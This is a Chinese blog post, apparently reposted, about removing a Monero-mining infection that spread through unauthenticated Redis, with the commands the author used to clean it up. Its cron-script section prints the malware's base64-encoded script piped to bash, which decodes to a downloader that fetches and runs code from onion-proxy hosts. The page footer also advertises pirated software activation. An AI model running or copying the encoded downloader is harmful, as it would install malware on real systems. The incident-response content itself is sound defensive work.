Linux 中挖矿病毒处理过程

Linux 中挖矿病毒处理过程分享一次Linux系统杀毒的经历,还有个人的一些总结,希望对大家有用。进程占CPU700%,进程名字是类似XY2Arv的6位随机大小写字母+数字的字符串。最终发现是一个叫systemd或trump的病毒,是一个挖矿的病毒,在挖一种叫门罗币(XMR)的数字货币。该病毒的侵入方式是通过扫描主机的Redis端口,一般默认为6379,通过Redis命令将程序注入到你的主机,Re…

大家好,又见面了,我是你们的朋友全栈君。

分享一次Linux系统杀毒的经历,还有个人的一些总结,希望对大家有用。

进程占CPU 700%,进程名字是类似XY2Arv的6位随机大小写字母+数字的字符串。最终发现是一个叫systemd或trump的病毒,是一个挖矿的病毒,在挖一种叫门罗币(XMR)的数字货币。

该病毒的侵入方式是通过扫描主机的Redis端口,一般默认为6379,通过Redis命令将程序注入到你的主机,Redis 默认情况下,会绑定在 0.0.0.0:6379,在没有利用防火墙进行屏蔽的情况下,将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 ~/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器;如果Redis服务是以root权限启动,可以利用该问题直接获得服务器root权限

整个入侵流程大概是包含以下几个环节:

1、扫描开放6379端口的Linux服务器(后续感染扫描网段为1.0.0.0/16到224.255.0.0/16)

2、通过redis-cli尝试连接Redis并执行预置在.dat文件里的利用命令将Redis的数据文件修改为/var/spool/cron/root,然后通过在Redis中插入数据,将下载执行脚本的动作写入crontab任务

3、通过脚本实现以上的相关行为,完成植入并启动挖矿程序

4、再编译安装pnscan,继续扫描感染下一个目标

逐渐排查并解决:

5. 查看进程实际运行应用

> ll /proc/26978/exe

lrwxrwxrwx 1 root root 0 Nov 18 05:12 /proc/26978/exe -> /usr/bin/f5ca2c418471f93c1e5a59fea5939e89 (deleted)

可以看到进程启动完就删除了

6. 查看进程的由来

> lsof -p 32559

COMMAND   PID USER   FD   TYPE     DEVICE SIZE/OFF   NODE NAME

wAMj4J  32559 root  cwd    DIR      253,1    20480 655363 /usr/bin

wAMj4J  32559 root  rtd    DIR      253,1     4096      2 /

wAMj4J  32559 root  txt    REG      253,1   260544 657105 /usr/bin/e48377a2d8e8e119d1454aa4cd5647c0 (deleted)

wAMj4J  32559 root    0u  IPv4 1769948316      0t0    TCP iZ2ze98732cvvbbjgcwf4wZ:35060->222.35.250.117:https (ESTABLISHED)

wAMj4J  32559 root    3w   REG      253,1        6 396140 /tmp/.X11-unix/1

可以看到源头是从/tmp下的一个子目录里的文件来的,从222.35.250.117上获取的木马代码,根据这个ip从网上查又查出这个地址其他人也碰到过类似的。先kill进程,顺便把/tmp目录下所有目录和文件删除。

https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool

然后从这个网站下载busybox及clear.sh

为防止病毒将rm命令劫持,请将busybox工具箱上传到/bin/目录下,然后使用它进行删除

/bin/busybox rm -rf /tmp

查看定时任务

> crontab -l5 * * * * /root/.trump >/dev/null 2>&1

检查/root/.trump文件发现里面主要的代码都用base64编码了,可以用bejson.com解码看看内容,删除这个文件,通过 crontab -e删除定时任务。

> cat /root/.trump

#!/bin/bash

exec &>/dev/null

echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10cnVtcHM0YzRvaHh2cTdvCnUoKSB7Cng9L2Nybgp3Z2V0IC10MSAtVDE4MCAtcVUtIC1PLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlICQxJHggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSR4Cn0KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wMSkvaW87IHRoZW4KKAp1ICR0Lm9uaW9uLmdsYXNzIHx8CnUgJHQuY2l2aWNsaW5rLm5ldHdvcmsgfHwKdSAkdC5vbmlvbi5tbiB8fAp1ICR0Lm9uaW9uLnNoIHx8CnUgJHQub25pb24uaW4ubmV0IHx8CnUgJHQudG9yMndlYi5pbyB8fAp1ICR0LjR0b3IubWwgfHwKdSAkdC5vbmlvbi50bwopfGJhc2gKZmkK|base64 -d|bash

7. 查找所有带trump的文件

> grep “trump” /etc/ -nri

Binary file /etc/udev/hwdb.bin matches/etc/cron.d/0trump:1:37 * * * * root /opt/trump >/dev/null 2>&1

删除 /etc/cron.d/0trump和/opt/trump

/bin/busybox rm -rf /etc/cron.d/0trump

/bin/busybox rm -rf /opt/trump

注:删除/opt/trump出现无法删除,chmod 777 也显示无权限,这时需执行chattr -i /opt/trump,然后再删除就可以了

最后为了安全,再执行下改良后的 clear.sh下文件,位置必须放在/bin/下

8.查看进程列表有无可疑进程(这个的目的是查找有无守护进程,自启的原因就是病毒主线程已经kill,但其守护进程没有kill掉)

> ps -lef

有2个进程叫ZY8Zrv和VcbzWG,查看由来也是从tmp相同目录来的,kill先。再发现2个可疑进程

0 S root      9736 22608  0  80   0 – 28296 do_wai 01:28 ?        00:00:00 sh -c echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c

0 S root     21043  9742  0  80   0 – 28056 do_wai 08:36 ?        00:00:00 timeout 1h ./ssh : 22 root ./pw

都kill掉。

8.设置redis密码。redis启动一定要设置密码。在redis.conf 中 requirepass XXX

参考脚本:https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/145072.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • 第一个模板类(templet<class elemType> class xxxxx)

    第一个模板类(templet<class elemType> class xxxxx)小弟是刚刚加入c++大队的,对c++中的基本知识只是稍微懂一点。今天在看《c++primer》中的模板类时,就将其中的程序在vs2008中写下,新建了Array.h和Array.cpp两个文件。主函数:Main.cpp1#include”stdafx.h”2#include<iostream>3#include”Array.h”45u…

  • navicat 15.0激活码【中文破解版】

    (navicat 15.0激活码)好多小伙伴总是说激活码老是失效,太麻烦,关注/收藏全栈君太难教程,2021永久激活的方法等着你。https://javaforall.cn/100143.htmlIntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,上面是详细链接哦~MLZPB5EL5Q-eyJsaWNlbnNlSWQiOi…

  • administrator改名字_win10改了用户名无法登录

    administrator改名字_win10改了用户名无法登录网友求助:xp用administrator_XP系统修改administrator的用户名_xpadministrator问题不想添加多一个用户的办法?????????????????最佳答案说实话没有看懂题主的要求。我只能从你题面对描述,即将高级管理员帐户“Administrator”改变成其他名字来解答。要想将WindowsXP中要将默认的系统用户名改变成其他名称是可以实现的,但是需要调用“组…

    2022年10月14日
  • 怎样免费完美的把PDF转Word?

    怎样免费完美的把PDF转Word?简介PDF可以分为文字型PDF和图片型PDF,文字型PDF即可以选中文字内容的PDF,反之图片型PDF即无法选中文字的PDF,其内容实际上是图片。本文针对不同类型,介绍PDF转Word方法,可以说是目前的最优解,没有之一。文字型PDF转Word方法1-直接用Word打开优点简单方便缺点部分样式丢失,排版错位,转换并不完美部分文件会有乱码无法识别图片型PDF里的文字总结适合对样式不敏感,主要关心正文内容的用户文字型PDF转Word方法2-使用超级PDF在线工具可以看到Word.

  • TDA2030的功率放大电路详细教程「建议收藏」

    TDA2030的功率放大电路详细教程「建议收藏」本电路可以将是利用运放TDA2030A制作的功率放大器。电源电压为±12V至±22V。输出的最大功率为18W。该电路为深度负反馈电路,输出电压的放大倍数约为Av=R1/R2=32.3(具体放大倍数请参考模电书籍负反馈部分)。其中R4选用大功率水泥电阻,因为空载时流过R4的电流会过大。D1与D2为二极管,有黑线或者银色线的一端为负极。没有标有正负号的电容为无极电容,不需要区别正负极。标有正负…

  • linux文件打开失败_linux浏览文件的命令

    linux文件打开失败_linux浏览文件的命令某次突然关闭连接…..会出现swp文件,那么就要使用ll-a找到swp文件然后rm-fswp文件,就可以正常打开文件了

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号